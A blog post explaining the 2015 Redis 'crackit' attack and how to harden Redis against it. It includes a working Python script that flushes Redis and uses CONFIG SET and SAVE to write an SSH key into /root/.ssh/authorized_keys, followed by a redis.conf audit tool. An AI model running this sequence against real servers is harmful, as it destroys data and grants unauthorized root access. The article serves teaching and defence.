———–

Well, I went for a clickbait title this time too. As careful as I am, how could I possibly let a server get hacked?

I was talking to a friend yesterday. He told me that he had a cloud server running the Redis database. One day he found that all the data in the database was gone except for one weird key-value pair, whose value looked like an RSA public key. Fortunately there was no important data on the server, so they did not care.

After some heart-to-heart talk, I learned that he was running an old open source project that had been discontinued, had installed an old version of Redis, and was not very skilled with Linux. I knew his server had been compromised. Since there are probably many people like my friend who pay no attention to operating system permissions, firewall settings and database protection, I am writing this article to briefly look at how this happens and how to prevent it.

PS: Against a current Redis this exact attack no longer works out of the box, because Redis 3.2 added protected mode (which refuses connections from other hosts while no bind address and no password are configured) and tightened the defaults in general, so we can only simulate it locally.

The incident

In fact, this kind of attack dates back to 2015. At that time Redis had almost no built-in protection, and it was up to operations staff to configure it sensibly to keep the database safe. At one point tens of thousands of Redis nodes around the world were attacked, with exactly the symptom described above: all data wiped except for a key called crackit, whose value looked like an RSA public key.

It was later verified that the attacker abused two Redis features, dynamic configuration (CONFIG SET) and data persistence (SAVE), to write his RSA public key into the file /root/.ssh/authorized_keys on the attacked server, so that he could log in as root with the matching private key and have the run of the system.

PS: I have carefully written more than 100 original articles and worked through 200 LeetCode problems by hand, all published and continuously updated in labuladong's algorithm cheat sheet. Bookmark it and go through the problems in the order of my articles to master every kind of algorithm pattern before diving back into the sea of problems.

The security of the compromised servers was very poor, as follows:

1. Redis listened on its default port (6379) and was reachable from the public Internet.

2. Redis had no password (requirepass) set.

3. The Redis process was started as root.

Each of these points is dangerous on its own, and together they are deadly. Never mind someone writing a public key into your system: simply connecting to your database and deleting it is already a big enough loss. So what does the attack actually look like? Below is a simple demonstration on the local loopback address.

Local demonstration

Redis listens on port 6379 by default, and I bind it to 127.0.0.1; connecting to it from the local machine then stands in for the real case where Redis is reachable from the public network.

Now I am an ordinary user named FDL. I want to SSH in as root on my system, which requires root's password; I do not know it, so I cannot log in.

Besides password login I could use an RSA key pair, but that requires putting my public key in root's home directory, in /root/.ssh/authorized_keys. We know that /root is not readable or writable by other users:

However, I find that I can access Redis directly:

If Redis is running as root, I can make Redis write my public key into root's home directory. One way Redis persists data is by generating RDB files that contain the raw key and value bytes.

I smiled an evil smile, wiped all the data in Redis, and wrote my RSA public key into the database. I added line breaks at the beginning and end so that the key stays on a line of its own and is not damaged when the RDB file is generated:

Then I make Redis save its data file as authorized_keys in /root/.ssh/ (by changing dir and dbfilename through CONFIG SET and then issuing SAVE), which it can do because it runs as root:

Now that root's home directory contains our RSA public key, we can use the key pair to log in as root:

Look at the public key we just wrote to root’s home:

The garbled bytes are the binary framing of the RDB file, but the public key in the middle is completely intact. sshd reads authorized_keys line by line and skips lines it cannot parse, so it happily recognizes the key line even surrounded by garbage.

Now that you have root, you can do whatever you want…
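The whole sequence above, written out as an added example (not code from the original post): a minimal RESP client that sends FLUSHALL, SET, CONFIG SET dir/dbfilename and SAVE over a raw socket, so you can see that the attack needs nothing more than a TCP connection, plus an offline imitation of how sshd reads authorized_keys that shows why the newline padding matters. The key, the RDB framing and the lab address are constructed placeholders; point run_attack only at a Redis you own on 127.0.0.1.

```python
"""
Added example, not code from the original post: a minimal RESP client that
reproduces the 2015 "crackit" technique (FLUSHALL, SET, CONFIG SET dir /
dbfilename, SAVE) against a Redis you own on 127.0.0.1, plus an offline
check of why the newline padding makes the resulting authorized_keys usable.
The key, paths and RDB framing below are constructed placeholders.
"""
import base64
import socket
import struct

# Constructed placeholder in OpenSSH wire layout (type string + junk), NOT a real key.
SAMPLE_PUBKEY = "ssh-rsa " + base64.b64encode(
    b"\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x03\x00\x00\x00\x03\x01\x00\x01"
).decode() + " crackit@example"

KEY_TYPES = (b"ssh-rsa", b"ssh-ed25519", b"ecdsa-sha2-nistp256")


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array: exactly what redis-cli puts on the wire."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(out)


def attack_commands(pubkey: str, ssh_dir: str = "/root/.ssh",
                    dbfile: str = "authorized_keys") -> list:
    """The command sequence the post describes, in order."""
    payload = "\n\n" + pubkey.strip() + "\n\n"   # keep the key on a line of its own
    return [
        ("FLUSHALL",),                             # the dump must contain only our key
        ("SET", "crackit", payload),
        ("CONFIG", "SET", "dir", ssh_dir),         # directory SAVE writes the RDB file to
        ("CONFIG", "SET", "dbfilename", dbfile),   # ... and the file name it uses
        ("SAVE",),                                 # synchronous snapshot: file written now
    ]


def run_attack(host: str, port: int, pubkey: str, timeout: float = 3.0) -> list:
    """Send the sequence over a raw socket and return the raw replies (+OK on success).
    Only ever point this at a lab instance you own."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for cmd in attack_commands(pubkey):
            sock.sendall(resp_encode(*cmd))
            replies.append(sock.recv(4096))
    return replies


def fake_rdb(value: str) -> bytes:
    """Rough, constructed imitation of the RDB framing around one string value
    (real headers differ in detail; enough to show the line-splitting effect)."""
    header = b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x07crackit"
    trailer = b"\xff" + b"\x00" * 8          # EOF opcode + (disabled) checksum
    return header + value.encode() + trailer


def usable_key_lines(blob: bytes) -> list:
    """Mimic how sshd reads authorized_keys: line by line, ignoring any line that is
    not '<type> <base64> [comment]' whose base64 decodes to a blob starting with
    that same type string. Returns the lines sshd would accept."""
    accepted = []
    for line in blob.split(b"\n"):
        parts = line.split()
        if len(parts) < 2 or parts[0] not in KEY_TYPES:
            continue
        try:
            decoded = base64.b64decode(parts[1], validate=True)
        except ValueError:                      # binascii.Error is a ValueError
            continue
        if decoded.startswith(struct.pack(">I", len(parts[0])) + parts[0]):
            accepted.append(line.strip().decode("ascii"))
    return accepted


if __name__ == "__main__":
    for cmd in attack_commands(SAMPLE_PUBKEY):
        print(resp_encode(*cmd))
    print("padded  :", usable_key_lines(fake_rdb("\n\n" + SAMPLE_PUBKEY + "\n\n")))
    print("unpadded:", usable_key_lines(fake_rdb(SAMPLE_PUBKEY)))
    # run_attack("127.0.0.1", 6379, SAMPLE_PUBKEY)   # lab instance only
```

Without the padding the key shares a line with the RDB header bytes, so the first whitespace-separated token is not a key type and sshd drops the line; with the padding it is a clean line of its own. The trick also relies on Redis storing the value uncompressed: a base64 key is high-entropy, so the LZF compression Redis applies to long strings in RDB files gains nothing and the raw bytes are written as-is.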


The lesson

Although this particular attack is essentially dead (a new Redis in its default configuration will not accept connections from the Internet without a password), everyone should still pay attention to system security.

When we tinker on our own cheap cloud server, we usually cannot be bothered to configure the firewall properly, and we leave the database without a password or set it to something like admin or root, on the grounds that there is no real data on it anyway. That is definitely not a good habit.

Our computer systems have become so sophisticated, and every mature project is maintained by such capable people and is technically so solid, that the thing most likely to go wrong is the people who use them.

It is like the QQ accounts you often see getting stolen. I am sure the thief did not break into Tencent's database; almost certainly the account owner had poor security awareness and typed their account and password into a phishing site. I have almost never seen a WeChat account stolen, which may be because WeChat de-emphasizes password login in favour of QR code scanning. That is probably a deliberate security decision, since WeChat has a payment function.

These scams are easy for tech people to spot by looking at the URL or inspecting the requests in the browser, but believe it or not, the average person really cannot tell a phishing site from the official one. Likewise, I find it hard to believe that in 2020 there are still people looking for this Redis weakness, and still people falling victim to it...

So, back to Redis: the official website gives clear security recommendations. Let me summarize them briefly:

1. Do not start Redis Server as root, and always set a password (requirepass) that is long enough that it cannot easily be brute-forced.

2. Configure the server firewall and the Redis config file (bind, protected-mode) so that Redis is not reachable from the outside world at all, if possible.

3. Use rename-command to rename or disable dangerous commands such as FLUSHALL and CONFIG, to prevent someone from wiping the database or redirecting its persistence files.
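To make the three recommendations concrete, here is an added example (not from the original post or from the Redis project): a small audit script that parses a redis.conf and reports which of the checks above it fails, run over a constructed "weak" file that mirrors the 2015 victims and a constructed hardened version of the same file. The 32-character password threshold and the list of commands that must be renamed are this example's own assumptions.

```python
"""
Added example, not from the original post or the Redis project: audit a
redis.conf against the recommendations above. WEAK_CONF and HARDENED_CONF
are constructed samples; MIN_PASSWORD_LEN and MUST_RENAME are assumptions.
"""
import shlex

MIN_PASSWORD_LEN = 32                              # assumption: too long to brute-force
MUST_RENAME = ("FLUSHALL", "FLUSHDB", "CONFIG")    # CONFIG is what the crackit attack used
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "-::*"}    # "listen on every interface" spellings

WEAK_CONF = """# constructed: what the compromised 2015 servers looked like
port 6379
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
"""

HARDENED_CONF = """# constructed: the same file with the recommendations applied
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass "4f8b2c9e1d7a3b6f0e5c8a2d9b1f4e7c0a3d6b9e"
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG "cfg-1f9a3d7e"
dir /var/lib/redis
"""


def parse_redis_conf(text: str) -> dict:
    """Map directive -> list of argument lists (directives such as rename-command repeat)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)              # redis.conf quotes values the same way
        conf.setdefault(tokens[0].lower(), []).append(tokens[1:])
    return conf


def audit_redis_conf(text: str) -> list:
    """Return finding codes for the recommendations; an empty list means all pass."""
    conf = parse_redis_conf(text)
    findings = []

    # Recommendation 2: do not expose Redis to the outside world.
    binds = conf.get("bind")
    if not binds or not binds[-1] or any(a in WILDCARD_BINDS for a in binds[-1]):
        findings.append("bind-all")
    pm = conf.get("protected-mode")
    if pm and pm[-1] and pm[-1][0].lower() == "no":   # protected mode only guards the
        findings.append("protected-mode-off")         # no-bind, no-password case anyway

    # Recommendation 1: a password, and not a short one.
    pw = conf.get("requirepass")
    if not pw or not pw[-1] or not pw[-1][0]:
        findings.append("requirepass-missing")
    elif len(pw[-1][0]) < MIN_PASSWORD_LEN:
        findings.append("requirepass-short")

    # Recommendation 3: dangerous commands renamed or disabled ("" disables).
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in MUST_RENAME:
        if cmd not in renamed:
            findings.append("rename-missing-" + cmd)
    return findings


EXPLAIN = {
    "bind-all": "listens on all interfaces; bind to 127.0.0.1 or a private address",
    "protected-mode-off": "protected mode disabled; nothing stops remote unauthenticated clients",
    "requirepass-missing": "no password; anyone who can reach the port is an administrator",
    "requirepass-short": "password shorter than %d characters" % MIN_PASSWORD_LEN,
}

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        codes = audit_redis_conf(text)
        print(f"{name}: {'OK' if not codes else ''}")
        for code in codes:
            print("  -", code, EXPLAIN.get(code, "dangerous command not renamed or disabled"))
```

The config file cannot tell you which user the process runs as or what the host firewall allows, so those two points still need checking outside Redis: run it under a dedicated account (for example `User=redis` in the systemd unit) and add a host firewall rule that only admits the application hosts, on top of the bind setting.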

_____________

My online e-book has 100 original articles and walks through 200 LeetCode problems by hand; worth bookmarking! The corresponding GitHub algorithm repository has earned 70K stars, feel free to star it too!